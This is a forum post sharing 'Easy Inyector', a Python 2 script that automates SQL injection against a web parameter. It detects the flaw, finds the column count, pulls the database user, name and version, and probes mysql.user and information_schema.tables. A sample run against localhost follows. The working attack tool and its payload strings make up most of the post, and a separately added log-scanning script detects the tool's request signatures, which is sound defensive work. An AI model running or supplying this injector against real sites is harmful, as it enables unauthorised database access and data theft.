[Python] Easy Inyector By Doddy H

Started by BigBear, 7 October 2011, 01:33 AM

BigBear

Well, this is the first version of this simple program that I made in perl; in
the next version I'll add other things and it will be able to scan several targets from a text file.

This thing looks for:

* Vulnerability (obviously)
* Column count limit
* Information about the database
* Automatically finds the column number that displays information
* Checks for the existence of mysql.user and information_schema.tables

Code (python):

#!/usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010
# Python 2 script (print statement, urllib2); indentation restored.

import os,sys,urllib2,re


def clean():
    if sys.platform=="win32":
        os.system("cls")
    else:
        os.system("clear")


def header() :
    print "\n--== Easy Inyector ==--\n"

def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

# fetch a URL and return the response body
def toma(web) :
    return urllib2.urlopen(web).read()

# (separator, comment) pair used when building the request
def bypass(bypass):
    if bypass == "--":
        return("+","--")
    elif bypass == "/*":
        return("/**/","/*")
    else:
        return("+","--")

def more(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Searching more data\n"
    web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
    code0 = toma(web1)
    if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
        datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
        datar = re.split("K0BRA",datax[0])
        print "[+] Username :",datar[1]
        print "[+] Database :",datar[2]
        print "[+] Version :",datar[3],"\n"
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    if (re.findall("K0BRA",code1)):
        print "[+] mysql.user : on"
    code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    if (re.findall("K0BRA",code2)):
        print "[+] information_schema.tables : on"

def findlength(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    number = "concat(0x4b30425241,1,0x4b30425241)"
    for te in range(2,30):
        number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
        code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
        if (re.findall("K0BRA(.*?)K0BRA",code)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code)
            print "[+] Column length :",te
            print "[+] Numbers",numbers,"print data"
            sql = ""
            tex = te + 1
            for sqlix in range(2,tex):
                sql = str(sql)+","+str(sqlix)
                sqli  = str(1)+sql
            sqla = re.sub(numbers[0],"hackman",sqli)
            more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
            print "\n[+] Scan Finished\n"
            sys.exit(1)
    print "[-] Length dont found\n"


def scan(web,passx):
    pass1,pass2 = bypass(passx)
    print "\n[+] Testing vulnerability"
    code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
        print "[+] SQLI Detected"
        findlength(web,passx)
    else:
        print "[-] Not Vulnerable"
        copyright()


header()

if len(sys.argv) != 2 :
    show()

else :
    try:
        scan(sys.argv[1],"--")
    except:
        copyright()


#The End

Usage example

C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010
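
As an added defender-side example (not part of the original post or the author's code), this Python 3 script flags, in constructed web-server access-log lines, the request signatures the tool above leaves behind: the UNION SELECT probe, the hex-encoded K0BRA (0x4b30425241) and 3MP3Z4R (0x334d50335a3452) delimiters it wraps its output in, and the follow-up mysql.user / information_schema.tables checks. The combined log format and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Request-level signatures of the injector described in the post: the UNION SELECT
# probe, the hex-encoded "K0BRA" (0x4b30425241) and "3MP3Z4R" (0x334d50335a3452)
# delimiters it wraps its output in, and the probes against mysql.user / information_schema.tables.
SIGNATURES = {
    "union_select": re.compile(r"union(?:\s|\+|/\*\*/)+select", re.I),
    "marker_k0bra": re.compile(r"0x4b30425241", re.I),
    "marker_3mp3z4r": re.compile(r"0x334d50335a3452", re.I),
    "probe_mysql_user": re.compile(r"\bmysql\.user\b", re.I),
    "probe_schema_tables": re.compile(r"\binformation_schema\.tables\b", re.I),
}

# Apache/nginx combined-format request line (assumed): client IP, request path, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def inspect_request(line):
    """Return a record of which signatures a log line matches (None if unparsable)."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, path, status = m.groups()
    decoded = unquote(path)  # %28, %2C etc. back to the characters the tool sent
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": ip, "path": path, "status": int(status), "hits": hits}

def scan_log(lines):
    """Keep only requests that match at least one signature."""
    return [r for r in map(inspect_request, lines) if r and r["hits"]]

def hits_by_ip(records):
    """Aggregate signatures per client: a 30-step column sweep plus a mysql.user probe is one escalating source."""
    out = {}
    for r in records:
        out.setdefault(r["ip"], set()).update(r["hits"])
    return out

# Constructed sample access-log lines (not from the post): three requests in the
# tool's sequence from 127.0.0.1 and one benign request from another client.
SAMPLE_LOG = [
    '127.0.0.1 - - [07/Oct/2011:01:33:00 -0300] "GET /sql.php?id=-1+union+select+1-- HTTP/1.1" 200 512',
    '127.0.0.1 - - [07/Oct/2011:01:33:01 -0300] "GET /sql.php?id=-1+union+select+concat(0x4b30425241,1,0x4b30425241),concat(0x4b30425241,2,0x4b30425241)-- HTTP/1.1" 200 640',
    '127.0.0.1 - - [07/Oct/2011:01:33:02 -0300] "GET /sql.php?id=-1+union+select+1,concat(0x334d50335a3452,0x4b30425241,user(),0x334d50335a3452),3+from+mysql.user-- HTTP/1.1" 200 700',
    '10.0.0.5 - - [07/Oct/2011:01:34:10 -0300] "GET /sql.php?id=7 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, names in hits_by_ip(scan_log(SAMPLE_LOG)).items():
        print(ip, sorted(names))
```

The access log only shows the requests; the "different number of columns" error the tool keys on is in the response body, so pairing this with application or database error logs gives the full picture.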





HIRONAKAMURA

;-)
Very good contribution for those of us who like programming in Python.
Everyone is good at finding problems, very few at finding solutions.